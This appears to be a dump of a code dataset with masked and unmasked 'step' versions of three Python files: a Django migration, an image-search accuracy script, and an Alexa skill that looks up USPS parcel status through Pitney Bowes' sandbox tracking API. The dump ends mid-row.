code
stringlengths 13
1.2M
| order_type
stringclasses 1
value | original_example
dict | step_ids
listlengths 1
5
|
---|---|---|---|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('courses', '0015_auto_20151216_1136'),
]
operations = [
migrations.AlterField(
model_name='duration',
name='duration',
field=models.DecimalField(default=60, verbose_name='duration', max_digits=10, decimal_places=0),
),
]
|
normal
|
{
"blob_id": "0cba18ca7126dda548a09f34dc26b83d6471bf68",
"index": 1652,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('courses', '0015_auto_20151216_1136')]\n operations = [migrations.AlterField(model_name='duration', name=\n 'duration', field=models.DecimalField(default=60, verbose_name=\n 'duration', max_digits=10, decimal_places=0))]\n",
"step-4": "from __future__ import unicode_literals\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('courses', '0015_auto_20151216_1136')]\n operations = [migrations.AlterField(model_name='duration', name=\n 'duration', field=models.DecimalField(default=60, verbose_name=\n 'duration', max_digits=10, decimal_places=0))]\n",
"step-5": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('courses', '0015_auto_20151216_1136'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='duration',\n name='duration',\n field=models.DecimalField(default=60, verbose_name='duration', max_digits=10, decimal_places=0),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# -*- coding: utf-8 -*-
import json
import argparse
def parse_args():
"""
Parse input arguments.
:return:
"""
parser = argparse.ArgumentParser(description='以图搜图API测试')
parser.add_argument('--ak', dest='access_key', help='access_key for qiniu account',
type=str)
parser.add_argument('--sk', dest='secret_key', help='secret_key for qiniu account',
type=str)
parser.add_argument('--in', dest='json_file', help='json file',
type=str)
return parser.parse_args()
if __name__ == '__main__':
args = parse_args()
file = open(args.json_file,'r')
res = []
a = 0
for line in file.readlines():
dic = json.loads(line)
img_url = dic["url"]
t = {"url": img_url, "true":0, "simialr_uri":[]}
if not "error" in dic.keys():
a += 1
#im_num = img_url.split('.')[-2].split('/')[-1].lstrip('image_group_test_')
im_num = img_url.split('.')[-2].split('/')[-1]#.lstrip('image_group_test_')
print(im_num)
for i in dic["result"]:
uri = []
#print((i["uri"].split('/'))[4].split('__')[0]=="eval",(i["uri"].split('/'))[4].split('-')[0])
print((i["uri"].split('/'))[4])
if ((i["uri"].split('/'))[4].split('__')[0]=="eval") and (im_num in (i["uri"].split('/'))[4].split('-')[0]):
t["simialr_uri"].append(i)
t["true"] += 1
res.append(t)
r = 0
for i in range(a):
r += res[i]["true"]
correct = r/(float(a)*15)
print ("The top-5 correct percentage is %f" % correct)
|
normal
|
{
"blob_id": "c7147741784b37b42200869002d4df5ddc900675",
"index": 2001,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef parse_args():\n \"\"\"\n Parse input arguments.\n :return:\n \"\"\"\n parser = argparse.ArgumentParser(description='以图搜图API测试')\n parser.add_argument('--ak', dest='access_key', help=\n 'access_key for qiniu account', type=str)\n parser.add_argument('--sk', dest='secret_key', help=\n 'secret_key for qiniu account', type=str)\n parser.add_argument('--in', dest='json_file', help='json file', type=str)\n return parser.parse_args()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef parse_args():\n \"\"\"\n Parse input arguments.\n :return:\n \"\"\"\n parser = argparse.ArgumentParser(description='以图搜图API测试')\n parser.add_argument('--ak', dest='access_key', help=\n 'access_key for qiniu account', type=str)\n parser.add_argument('--sk', dest='secret_key', help=\n 'secret_key for qiniu account', type=str)\n parser.add_argument('--in', dest='json_file', help='json file', type=str)\n return parser.parse_args()\n\n\nif __name__ == '__main__':\n args = parse_args()\n file = open(args.json_file, 'r')\n res = []\n a = 0\n for line in file.readlines():\n dic = json.loads(line)\n img_url = dic['url']\n t = {'url': img_url, 'true': 0, 'simialr_uri': []}\n if not 'error' in dic.keys():\n a += 1\n im_num = img_url.split('.')[-2].split('/')[-1]\n print(im_num)\n for i in dic['result']:\n uri = []\n print(i['uri'].split('/')[4])\n if i['uri'].split('/')[4].split('__')[0\n ] == 'eval' and im_num in i['uri'].split('/')[4].split('-'\n )[0]:\n t['simialr_uri'].append(i)\n t['true'] += 1\n res.append(t)\n r = 0\n for i in range(a):\n r += res[i]['true']\n correct = r / (float(a) * 15)\n print('The top-5 correct percentage is %f' % correct)\n",
"step-4": "import json\nimport argparse\n\n\ndef parse_args():\n \"\"\"\n Parse input arguments.\n :return:\n \"\"\"\n parser = argparse.ArgumentParser(description='以图搜图API测试')\n parser.add_argument('--ak', dest='access_key', help=\n 'access_key for qiniu account', type=str)\n parser.add_argument('--sk', dest='secret_key', help=\n 'secret_key for qiniu account', type=str)\n parser.add_argument('--in', dest='json_file', help='json file', type=str)\n return parser.parse_args()\n\n\nif __name__ == '__main__':\n args = parse_args()\n file = open(args.json_file, 'r')\n res = []\n a = 0\n for line in file.readlines():\n dic = json.loads(line)\n img_url = dic['url']\n t = {'url': img_url, 'true': 0, 'simialr_uri': []}\n if not 'error' in dic.keys():\n a += 1\n im_num = img_url.split('.')[-2].split('/')[-1]\n print(im_num)\n for i in dic['result']:\n uri = []\n print(i['uri'].split('/')[4])\n if i['uri'].split('/')[4].split('__')[0\n ] == 'eval' and im_num in i['uri'].split('/')[4].split('-'\n )[0]:\n t['simialr_uri'].append(i)\n t['true'] += 1\n res.append(t)\n r = 0\n for i in range(a):\n r += res[i]['true']\n correct = r / (float(a) * 15)\n print('The top-5 correct percentage is %f' % correct)\n",
"step-5": "# -*- coding: utf-8 -*-\nimport json\nimport argparse\n\ndef parse_args():\n \"\"\"\n Parse input arguments.\n :return:\n \"\"\"\n parser = argparse.ArgumentParser(description='以图搜图API测试')\n parser.add_argument('--ak', dest='access_key', help='access_key for qiniu account',\n type=str)\n\n parser.add_argument('--sk', dest='secret_key', help='secret_key for qiniu account',\n type=str)\n\n parser.add_argument('--in', dest='json_file', help='json file',\n type=str)\n\n return parser.parse_args()\n\n\nif __name__ == '__main__':\n args = parse_args()\n\n file = open(args.json_file,'r')\n res = []\n a = 0\n\n for line in file.readlines():\n dic = json.loads(line)\n img_url = dic[\"url\"]\n t = {\"url\": img_url, \"true\":0, \"simialr_uri\":[]}\n if not \"error\" in dic.keys():\n a += 1\n #im_num = img_url.split('.')[-2].split('/')[-1].lstrip('image_group_test_')\n im_num = img_url.split('.')[-2].split('/')[-1]#.lstrip('image_group_test_')\n print(im_num)\n for i in dic[\"result\"]:\n uri = []\n #print((i[\"uri\"].split('/'))[4].split('__')[0]==\"eval\",(i[\"uri\"].split('/'))[4].split('-')[0])\n print((i[\"uri\"].split('/'))[4])\n if ((i[\"uri\"].split('/'))[4].split('__')[0]==\"eval\") and (im_num in (i[\"uri\"].split('/'))[4].split('-')[0]):\n t[\"simialr_uri\"].append(i)\n t[\"true\"] += 1\n res.append(t)\n\n r = 0\n for i in range(a):\n r += res[i][\"true\"]\n\n correct = r/(float(a)*15)\n print (\"The top-5 correct percentage is %f\" % correct)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
"""
Code for Alexa skill to check PB tracking
"""
from __future__ import print_function
import traceback
import requests
import os
import json
# --------------- Helpers that build all of the responses ----------------------
def build_speechlet_response(title, output, reprompt_text, should_end_session):
return {
'outputSpeech': {
'type': 'PlainText',
'text': output
},
'card': {
'type': 'Simple',
'title': "SessionSpeechlet - " + title,
'content': "SessionSpeechlet - " + output
},
'reprompt': {
'outputSpeech': {
'type': 'PlainText',
'text': reprompt_text
}
},
'shouldEndSession': should_end_session
}
def build_response(session_attributes, speechlet_response):
return {
'version': '1.0',
'sessionAttributes': session_attributes,
'response': speechlet_response
}
# --------------- Functions that control the skill's behavior ------------------
def get_welcome_response():
""" If we wanted to initialize the session to have some attributes we could
add those here
"""
session_attributes = {}
card_title = "Welcome to PB Parcel Tracker"
speech_output = "Please give first 10 digits of tracking number"
# If the user either does not reply to the welcome message or says something
# that is not understood, they will be prompted again with this text.
reprompt_text = "Please give first 10 digits of tracking number"
should_end_session = False
return build_response(session_attributes, build_speechlet_response(
card_title, speech_output, reprompt_text, should_end_session))
def handle_session_end_request():
card_title = "Session Ended"
speech_output = "Thank you for trying the Alexa Skills Kit sample. " \
"Have a nice day! "
# Setting this to true ends the session and exits the skill.
should_end_session = True
return build_response({}, build_speechlet_response(
card_title, speech_output, None, should_end_session))
#----- get tracking ------
def setFirstEleven(intent, session):
session_attributes = {}
should_end_session = False
speech_output = "Now give remaining digits"
reprompt_text = "Now give the next eleven numbers"
try:
tracking_number_1 = intent['slots']['One']['value']
tracking_number_2 = intent['slots']['Two']['value']
tracking_number_3 = intent['slots']['Three']['value']
tracking_number_4 = intent['slots']['Four']['value']
tracking_number_5 = intent['slots']['Five']['value']
tracking_number_6 = intent['slots']['Six']['value']
tracking_number_7 = intent['slots']['Seven']['value']
tracking_number_8 = intent['slots']['Eight']['value']
tracking_number_9 = intent['slots']['Nine']['value']
tracking_number_10 = intent['slots']['Ten']['value']
first_ten = "%s%s%s%s%s%s%s%s%s%s" % (tracking_number_1, tracking_number_2,tracking_number_3, tracking_number_4,tracking_number_5, tracking_number_6,tracking_number_7, tracking_number_8,tracking_number_9, tracking_number_10)
session_attributes['first_ten'] = first_ten
print("session after adding first ten--->")
print(session_attributes)
except Exception as app_exception:
traceback.print_tb
speech_output = "There was some problem, Please provide first ten digits of the tracking number"
reprompt_text = "Please say first ten digits of the tracking number"
return build_response(session_attributes, build_speechlet_response(
intent['name'], speech_output, reprompt_text, should_end_session))
#----- get tracking ------
def getParcelStatus(intent, session):
session_attributes = {}
should_end_session = True
speech_output = "There was some problem in taking your input"
reprompt_text = "Please say remaining digits of the tracking number"
try:
tracking_number_11= intent['slots']['Eleven']['value']
tracking_number_12 = intent['slots']['Twelve']['value']
tracking_number_13 = intent['slots']['Thirteen']['value']
tracking_number_14 = intent['slots']['Fourteen']['value']
tracking_number_15 = intent['slots']['Fifteen']['value']
tracking_number_16 = intent['slots']['Sixteen']['value']
tracking_number_17 = intent['slots']['Seventeen']['value']
tracking_number_18 = intent['slots']['Eighteen']['value']
tracking_number_19 = intent['slots']['Nineteen']['value']
tracking_number_20 = intent['slots']['Twenty']['value']
tracking_number_21 = intent['slots']['TwentyOne']['value']
tracking_number_22 = intent['slots']['TwentyTwo']['value']
tracking_number = "%s%s%s%s%s%s%s%s%s%s%s%s" % (tracking_number_11,tracking_number_12, tracking_number_13, tracking_number_14,tracking_number_15, tracking_number_16,tracking_number_17, tracking_number_18,tracking_number_19, tracking_number_20,tracking_number_21, tracking_number_22)
print("'first_ten' not in session['attributes']--->")
print('first_ten' not in session['attributes'])
full_tracking_number = "%s%s" % (session['attributes']['first_ten'], tracking_number)
bearer = "Bearer %s" % (session['access_token'])
print("USPS FULL Tracking Number ----> %s" % (full_tracking_number))
url = "https://api-sandbox.pitneybowes.com/shippingservices/v1/tracking/%s?packageIdentifierType=TrackingNumber&carrier=USPS" %(full_tracking_number)
r=requests.get(url, headers={"Authorization" : bearer})
tracking_response = {}
tracking_response = json.loads(r.content)
if(r.status_code == 200):
speech_output = "The status of the parcel is "+tracking_response['status']
reprompt_text = "The status of the parcel is "+tracking_response['status']
else:
speech_output = tracking_response['errors'][0]['errorDescription']
reprompt_text = tracking_response['errors'][0]['errorDescription']
print(r.content)
except Exception as app_exception:
traceback.print_tb
should_end_session = False
if ('attributes' not in session or ('attributes' in session and 'first_ten' not in session['attributes'])):
speech_output = "Please provide only first ten digits of the tracking number"
reprompt_text = "Please provide only first ten digits of the tracking number"
else:
speech_output = "There was some problem, Please say remaining digits of the tracking number"
reprompt_text = "Please say remaining digits of the tracking number"
return build_response(session_attributes, build_speechlet_response(
intent['name'], speech_output, reprompt_text, should_end_session))
# --------------- Events ------------------
def on_session_started(session_started_request, session):
""" Called when the session starts """
print("on_session_started requestId=" + session_started_request['requestId']
+ ", sessionId=" + session['sessionId'])
def on_launch(launch_request, session):
""" Called when the user launches the skill without specifying what they
want
"""
print("on_launch requestId=" + launch_request['requestId'] +
", sessionId=" + session['sessionId'])
# Dispatch to your skill's launch
return get_welcome_response()
def oauth_request(session):
access_key = os.environ['key']
access_key_value = "Basic "+access_key
url = 'https://api-sandbox.pitneybowes.com/oauth/token'
r = requests.post(url, headers={"Authorization": access_key_value,
"Content-Type": "application/x-www-form-urlencoded"},
data={"grant_type": "client_credentials"})
print(r.status_code)
if(r.status_code == 200):
j = json.loads(r.content)
print(j)
session['access_token'] = j['access_token']
def on_intent(intent_request, session):
""" Called when the user specifies an intent for this skill """
print("on_intent requestId=" + intent_request['requestId'] +
", sessionId=" + session['sessionId'])
intent = intent_request['intent']
intent_name = intent_request['intent']['name']
if('access_token' not in session):
oauth_request(session)
print(session['access_token'])
# Dispatch to your skill's intent handlers
if intent_name == "Tracking":
return setFirstEleven(intent, session)
elif intent_name == "TrackingSecond":
return getParcelStatus(intent, session)
elif intent_name == "AMAZON.HelpIntent":
return get_welcome_response()
elif intent_name == "AMAZON.CancelIntent" or intent_name == "AMAZON.StopIntent":
return handle_session_end_request()
else:
raise ValueError("Invalid intent")
def on_session_ended(session_ended_request, session):
""" Called when the user ends the session.
Is not called when the skill returns should_end_session=true
"""
print("on_session_ended requestId=" + session_ended_request['requestId'] +
", sessionId=" + session['sessionId'])
# add cleanup logic here
# --------------- Main handler ------------------
def lambda_handler(event, context):
""" Route the incoming request based on type (LaunchRequest, IntentRequest,
etc.) The JSON body of the request is provided in the event parameter.
"""
print("event.session.application.applicationId=" +
event['session']['application']['applicationId'])
"""
Uncomment this if statement and populate with your skill's application ID to
prevent someone else from configuring a skill that sends requests to this
function.
"""
# if (event['session']['application']['applicationId'] !=
# "amzn1.echo-sdk-ams.app.[unique-value-here]"):
# raise ValueError("Invalid Application ID")
if event['session']['new']:
on_session_started({'requestId': event['request']['requestId']},
event['session'])
if event['request']['type'] == "LaunchRequest":
return on_launch(event['request'], event['session'])
elif event['request']['type'] == "IntentRequest":
return on_intent(event['request'], event['session'])
elif event['request']['type'] == "SessionEndedRequest":
return on_session_ended(event['request'], event['session'])
|
normal
|
{
"blob_id": "a5ef2adbf85b5ab80c59697340f94bc57d60952e",
"index": 4463,
"step-1": "<mask token>\n\n\ndef build_response(session_attributes, speechlet_response):\n return {'version': '1.0', 'sessionAttributes': session_attributes,\n 'response': speechlet_response}\n\n\ndef get_welcome_response():\n \"\"\" If we wanted to initialize the session to have some attributes we could\n add those here\n \"\"\"\n session_attributes = {}\n card_title = 'Welcome to PB Parcel Tracker'\n speech_output = 'Please give first 10 digits of tracking number'\n reprompt_text = 'Please give first 10 digits of tracking number'\n should_end_session = False\n return build_response(session_attributes, build_speechlet_response(\n card_title, speech_output, reprompt_text, should_end_session))\n\n\ndef handle_session_end_request():\n card_title = 'Session Ended'\n speech_output = (\n 'Thank you for trying the Alexa Skills Kit sample. Have a nice day! ')\n should_end_session = True\n return build_response({}, build_speechlet_response(card_title,\n speech_output, None, should_end_session))\n\n\n<mask token>\n\n\ndef on_session_started(session_started_request, session):\n \"\"\" Called when the session starts \"\"\"\n print('on_session_started requestId=' + session_started_request[\n 'requestId'] + ', sessionId=' + session['sessionId'])\n\n\ndef on_launch(launch_request, session):\n \"\"\" Called when the user launches the skill without specifying what they\n want\n \"\"\"\n print('on_launch requestId=' + launch_request['requestId'] +\n ', sessionId=' + session['sessionId'])\n return get_welcome_response()\n\n\ndef oauth_request(session):\n access_key = os.environ['key']\n access_key_value = 'Basic ' + access_key\n url = 'https://api-sandbox.pitneybowes.com/oauth/token'\n r = requests.post(url, headers={'Authorization': access_key_value,\n 'Content-Type': 'application/x-www-form-urlencoded'}, data={\n 'grant_type': 'client_credentials'})\n print(r.status_code)\n if r.status_code == 200:\n j = json.loads(r.content)\n print(j)\n session['access_token'] = j['access_token']\n\n\ndef on_intent(intent_request, session):\n \"\"\" Called when the user specifies an intent for this skill \"\"\"\n print('on_intent requestId=' + intent_request['requestId'] +\n ', sessionId=' + session['sessionId'])\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n if 'access_token' not in session:\n oauth_request(session)\n print(session['access_token'])\n if intent_name == 'Tracking':\n return setFirstEleven(intent, session)\n elif intent_name == 'TrackingSecond':\n return getParcelStatus(intent, session)\n elif intent_name == 'AMAZON.HelpIntent':\n return get_welcome_response()\n elif intent_name == 'AMAZON.CancelIntent' or intent_name == 'AMAZON.StopIntent':\n return handle_session_end_request()\n else:\n raise ValueError('Invalid intent')\n\n\ndef on_session_ended(session_ended_request, session):\n \"\"\" Called when the user ends the session.\n\n Is not called when the skill returns should_end_session=true\n \"\"\"\n print('on_session_ended requestId=' + session_ended_request['requestId'\n ] + ', sessionId=' + session['sessionId'])\n\n\ndef lambda_handler(event, context):\n \"\"\" Route the incoming request based on type (LaunchRequest, IntentRequest,\n etc.) The JSON body of the request is provided in the event parameter.\n \"\"\"\n print('event.session.application.applicationId=' + event['session'][\n 'application']['applicationId'])\n \"\"\"\n Uncomment this if statement and populate with your skill's application ID to\n prevent someone else from configuring a skill that sends requests to this\n function.\n \"\"\"\n if event['session']['new']:\n on_session_started({'requestId': event['request']['requestId']},\n event['session'])\n if event['request']['type'] == 'LaunchRequest':\n return on_launch(event['request'], event['session'])\n elif event['request']['type'] == 'IntentRequest':\n return on_intent(event['request'], event['session'])\n elif event['request']['type'] == 'SessionEndedRequest':\n return on_session_ended(event['request'], event['session'])\n",
"step-2": "<mask token>\n\n\ndef build_response(session_attributes, speechlet_response):\n return {'version': '1.0', 'sessionAttributes': session_attributes,\n 'response': speechlet_response}\n\n\ndef get_welcome_response():\n \"\"\" If we wanted to initialize the session to have some attributes we could\n add those here\n \"\"\"\n session_attributes = {}\n card_title = 'Welcome to PB Parcel Tracker'\n speech_output = 'Please give first 10 digits of tracking number'\n reprompt_text = 'Please give first 10 digits of tracking number'\n should_end_session = False\n return build_response(session_attributes, build_speechlet_response(\n card_title, speech_output, reprompt_text, should_end_session))\n\n\ndef handle_session_end_request():\n card_title = 'Session Ended'\n speech_output = (\n 'Thank you for trying the Alexa Skills Kit sample. Have a nice day! ')\n should_end_session = True\n return build_response({}, build_speechlet_response(card_title,\n speech_output, None, should_end_session))\n\n\n<mask token>\n\n\ndef getParcelStatus(intent, session):\n session_attributes = {}\n should_end_session = True\n speech_output = 'There was some problem in taking your input'\n reprompt_text = 'Please say remaining digits of the tracking number'\n try:\n tracking_number_11 = intent['slots']['Eleven']['value']\n tracking_number_12 = intent['slots']['Twelve']['value']\n tracking_number_13 = intent['slots']['Thirteen']['value']\n tracking_number_14 = intent['slots']['Fourteen']['value']\n tracking_number_15 = intent['slots']['Fifteen']['value']\n tracking_number_16 = intent['slots']['Sixteen']['value']\n tracking_number_17 = intent['slots']['Seventeen']['value']\n tracking_number_18 = intent['slots']['Eighteen']['value']\n tracking_number_19 = intent['slots']['Nineteen']['value']\n tracking_number_20 = intent['slots']['Twenty']['value']\n tracking_number_21 = intent['slots']['TwentyOne']['value']\n tracking_number_22 = intent['slots']['TwentyTwo']['value']\n tracking_number = '%s%s%s%s%s%s%s%s%s%s%s%s' % (tracking_number_11,\n tracking_number_12, tracking_number_13, tracking_number_14,\n tracking_number_15, tracking_number_16, tracking_number_17,\n tracking_number_18, tracking_number_19, tracking_number_20,\n tracking_number_21, tracking_number_22)\n print(\"'first_ten' not in session['attributes']--->\")\n print('first_ten' not in session['attributes'])\n full_tracking_number = '%s%s' % (session['attributes']['first_ten'],\n tracking_number)\n bearer = 'Bearer %s' % session['access_token']\n print('USPS FULL Tracking Number ----> %s' % full_tracking_number)\n url = (\n 'https://api-sandbox.pitneybowes.com/shippingservices/v1/tracking/%s?packageIdentifierType=TrackingNumber&carrier=USPS'\n % full_tracking_number)\n r = requests.get(url, headers={'Authorization': bearer})\n tracking_response = {}\n tracking_response = json.loads(r.content)\n if r.status_code == 200:\n speech_output = 'The status of the parcel is ' + tracking_response[\n 'status']\n reprompt_text = 'The status of the parcel is ' + tracking_response[\n 'status']\n else:\n speech_output = tracking_response['errors'][0]['errorDescription']\n reprompt_text = tracking_response['errors'][0]['errorDescription']\n print(r.content)\n except Exception as app_exception:\n traceback.print_tb\n should_end_session = False\n if ('attributes' not in session or 'attributes' in session and \n 'first_ten' not in session['attributes']):\n speech_output = (\n 'Please provide only first ten digits of the tracking number')\n reprompt_text = (\n 'Please provide only first ten digits of the tracking number')\n else:\n speech_output = (\n 'There was some problem, Please say remaining digits of the tracking number'\n )\n reprompt_text = (\n 'Please say remaining digits of the tracking number')\n return build_response(session_attributes, build_speechlet_response(\n intent['name'], speech_output, reprompt_text, should_end_session))\n\n\ndef on_session_started(session_started_request, session):\n \"\"\" Called when the session starts \"\"\"\n print('on_session_started requestId=' + session_started_request[\n 'requestId'] + ', sessionId=' + session['sessionId'])\n\n\ndef on_launch(launch_request, session):\n \"\"\" Called when the user launches the skill without specifying what they\n want\n \"\"\"\n print('on_launch requestId=' + launch_request['requestId'] +\n ', sessionId=' + session['sessionId'])\n return get_welcome_response()\n\n\ndef oauth_request(session):\n access_key = os.environ['key']\n access_key_value = 'Basic ' + access_key\n url = 'https://api-sandbox.pitneybowes.com/oauth/token'\n r = requests.post(url, headers={'Authorization': access_key_value,\n 'Content-Type': 'application/x-www-form-urlencoded'}, data={\n 'grant_type': 'client_credentials'})\n print(r.status_code)\n if r.status_code == 200:\n j = json.loads(r.content)\n print(j)\n session['access_token'] = j['access_token']\n\n\ndef on_intent(intent_request, session):\n \"\"\" Called when the user specifies an intent for this skill \"\"\"\n print('on_intent requestId=' + intent_request['requestId'] +\n ', sessionId=' + session['sessionId'])\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n if 'access_token' not in session:\n oauth_request(session)\n print(session['access_token'])\n if intent_name == 'Tracking':\n return setFirstEleven(intent, session)\n elif intent_name == 'TrackingSecond':\n return getParcelStatus(intent, session)\n elif intent_name == 'AMAZON.HelpIntent':\n return get_welcome_response()\n elif intent_name == 'AMAZON.CancelIntent' or intent_name == 'AMAZON.StopIntent':\n return handle_session_end_request()\n else:\n raise ValueError('Invalid intent')\n\n\ndef on_session_ended(session_ended_request, session):\n \"\"\" Called when the user ends the session.\n\n Is not called when the skill returns should_end_session=true\n \"\"\"\n print('on_session_ended requestId=' + session_ended_request['requestId'\n ] + ', sessionId=' + session['sessionId'])\n\n\ndef lambda_handler(event, context):\n \"\"\" Route the incoming request based on type (LaunchRequest, IntentRequest,\n etc.) The JSON body of the request is provided in the event parameter.\n \"\"\"\n print('event.session.application.applicationId=' + event['session'][\n 'application']['applicationId'])\n \"\"\"\n Uncomment this if statement and populate with your skill's application ID to\n prevent someone else from configuring a skill that sends requests to this\n function.\n \"\"\"\n if event['session']['new']:\n on_session_started({'requestId': event['request']['requestId']},\n event['session'])\n if event['request']['type'] == 'LaunchRequest':\n return on_launch(event['request'], event['session'])\n elif event['request']['type'] == 'IntentRequest':\n return on_intent(event['request'], event['session'])\n elif event['request']['type'] == 'SessionEndedRequest':\n return on_session_ended(event['request'], event['session'])\n",
"step-3": "<mask token>\n\n\ndef build_speechlet_response(title, output, reprompt_text, should_end_session):\n return {'outputSpeech': {'type': 'PlainText', 'text': output}, 'card':\n {'type': 'Simple', 'title': 'SessionSpeechlet - ' + title,\n 'content': 'SessionSpeechlet - ' + output}, 'reprompt': {\n 'outputSpeech': {'type': 'PlainText', 'text': reprompt_text}},\n 'shouldEndSession': should_end_session}\n\n\ndef build_response(session_attributes, speechlet_response):\n return {'version': '1.0', 'sessionAttributes': session_attributes,\n 'response': speechlet_response}\n\n\ndef get_welcome_response():\n \"\"\" If we wanted to initialize the session to have some attributes we could\n add those here\n \"\"\"\n session_attributes = {}\n card_title = 'Welcome to PB Parcel Tracker'\n speech_output = 'Please give first 10 digits of tracking number'\n reprompt_text = 'Please give first 10 digits of tracking number'\n should_end_session = False\n return build_response(session_attributes, build_speechlet_response(\n card_title, speech_output, reprompt_text, should_end_session))\n\n\ndef handle_session_end_request():\n card_title = 'Session Ended'\n speech_output = (\n 'Thank you for trying the Alexa Skills Kit sample. Have a nice day! ')\n should_end_session = True\n return build_response({}, build_speechlet_response(card_title,\n speech_output, None, should_end_session))\n\n\ndef setFirstEleven(intent, session):\n session_attributes = {}\n should_end_session = False\n speech_output = 'Now give remaining digits'\n reprompt_text = 'Now give the next eleven numbers'\n try:\n tracking_number_1 = intent['slots']['One']['value']\n tracking_number_2 = intent['slots']['Two']['value']\n tracking_number_3 = intent['slots']['Three']['value']\n tracking_number_4 = intent['slots']['Four']['value']\n tracking_number_5 = intent['slots']['Five']['value']\n tracking_number_6 = intent['slots']['Six']['value']\n tracking_number_7 = intent['slots']['Seven']['value']\n tracking_number_8 = intent['slots']['Eight']['value']\n tracking_number_9 = intent['slots']['Nine']['value']\n tracking_number_10 = intent['slots']['Ten']['value']\n first_ten = '%s%s%s%s%s%s%s%s%s%s' % (tracking_number_1,\n tracking_number_2, tracking_number_3, tracking_number_4,\n tracking_number_5, tracking_number_6, tracking_number_7,\n tracking_number_8, tracking_number_9, tracking_number_10)\n session_attributes['first_ten'] = first_ten\n print('session after adding first ten--->')\n print(session_attributes)\n except Exception as app_exception:\n traceback.print_tb\n speech_output = (\n 'There was some problem, Please provide first ten digits of the tracking number'\n )\n reprompt_text = 'Please say first ten digits of the tracking number'\n return build_response(session_attributes, build_speechlet_response(\n intent['name'], speech_output, reprompt_text, should_end_session))\n\n\ndef getParcelStatus(intent, session):\n session_attributes = {}\n should_end_session = True\n speech_output = 'There was some problem in taking your input'\n reprompt_text = 'Please say remaining digits of the tracking number'\n try:\n tracking_number_11 = intent['slots']['Eleven']['value']\n tracking_number_12 = intent['slots']['Twelve']['value']\n tracking_number_13 = intent['slots']['Thirteen']['value']\n tracking_number_14 = intent['slots']['Fourteen']['value']\n tracking_number_15 = intent['slots']['Fifteen']['value']\n tracking_number_16 = intent['slots']['Sixteen']['value']\n tracking_number_17 = intent['slots']['Seventeen']['value']\n tracking_number_18 = intent['slots']['Eighteen']['value']\n tracking_number_19 = intent['slots']['Nineteen']['value']\n tracking_number_20 = intent['slots']['Twenty']['value']\n tracking_number_21 = intent['slots']['TwentyOne']['value']\n tracking_number_22 = intent['slots']['TwentyTwo']['value']\n tracking_number = '%s%s%s%s%s%s%s%s%s%s%s%s' % (tracking_number_11,\n tracking_number_12, tracking_number_13, tracking_number_14,\n tracking_number_15, tracking_number_16, tracking_number_17,\n tracking_number_18, tracking_number_19, tracking_number_20,\n tracking_number_21, tracking_number_22)\n print(\"'first_ten' not in session['attributes']--->\")\n print('first_ten' not in session['attributes'])\n full_tracking_number = '%s%s' % (session['attributes']['first_ten'],\n tracking_number)\n bearer = 'Bearer %s' % session['access_token']\n print('USPS FULL Tracking Number ----> %s' % full_tracking_number)\n url = (\n 'https://api-sandbox.pitneybowes.com/shippingservices/v1/tracking/%s?packageIdentifierType=TrackingNumber&carrier=USPS'\n % full_tracking_number)\n r = requests.get(url, headers={'Authorization': bearer})\n tracking_response = {}\n tracking_response = json.loads(r.content)\n if r.status_code == 200:\n speech_output = 'The status of the parcel is ' + tracking_response[\n 'status']\n reprompt_text = 'The status of the parcel is ' + tracking_response[\n 'status']\n else:\n speech_output = tracking_response['errors'][0]['errorDescription']\n reprompt_text = tracking_response['errors'][0]['errorDescription']\n print(r.content)\n except Exception as app_exception:\n traceback.print_tb\n should_end_session = False\n if ('attributes' not in session or 'attributes' in session and \n 'first_ten' not in session['attributes']):\n speech_output = (\n 'Please provide only first ten digits of the tracking number')\n reprompt_text = (\n 'Please provide only first ten digits of the tracking number')\n else:\n speech_output = (\n 'There was some problem, Please say remaining digits of the tracking number'\n )\n reprompt_text = (\n 'Please say remaining digits of the tracking number')\n return build_response(session_attributes, build_speechlet_response(\n intent['name'], speech_output, reprompt_text, should_end_session))\n\n\ndef on_session_started(session_started_request, session):\n \"\"\" Called when the session starts \"\"\"\n print('on_session_started requestId=' + session_started_request[\n 'requestId'] + ', sessionId=' + session['sessionId'])\n\n\ndef on_launch(launch_request, session):\n \"\"\" Called when the user launches the skill without specifying what they\n want\n \"\"\"\n print('on_launch requestId=' + launch_request['requestId'] +\n ', sessionId=' + session['sessionId'])\n return get_welcome_response()\n\n\ndef oauth_request(session):\n access_key = os.environ['key']\n access_key_value = 'Basic ' + access_key\n url = 'https://api-sandbox.pitneybowes.com/oauth/token'\n r = requests.post(url, headers={'Authorization': access_key_value,\n 'Content-Type': 'application/x-www-form-urlencoded'}, data={\n 'grant_type': 'client_credentials'})\n print(r.status_code)\n if r.status_code == 200:\n j = json.loads(r.content)\n print(j)\n session['access_token'] = j['access_token']\n\n\ndef on_intent(intent_request, session):\n \"\"\" Called when the user specifies an intent for this skill \"\"\"\n print('on_intent requestId=' + intent_request['requestId'] +\n ', sessionId=' + session['sessionId'])\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n if 'access_token' not in session:\n oauth_request(session)\n print(session['access_token'])\n if intent_name == 'Tracking':\n return setFirstEleven(intent, session)\n elif intent_name == 'TrackingSecond':\n return getParcelStatus(intent, session)\n elif intent_name == 'AMAZON.HelpIntent':\n return get_welcome_response()\n elif intent_name == 'AMAZON.CancelIntent' or intent_name == 'AMAZON.StopIntent':\n return handle_session_end_request()\n else:\n raise ValueError('Invalid intent')\n\n\ndef on_session_ended(session_ended_request, session):\n \"\"\" Called when the user ends the session.\n\n Is not called when the skill returns 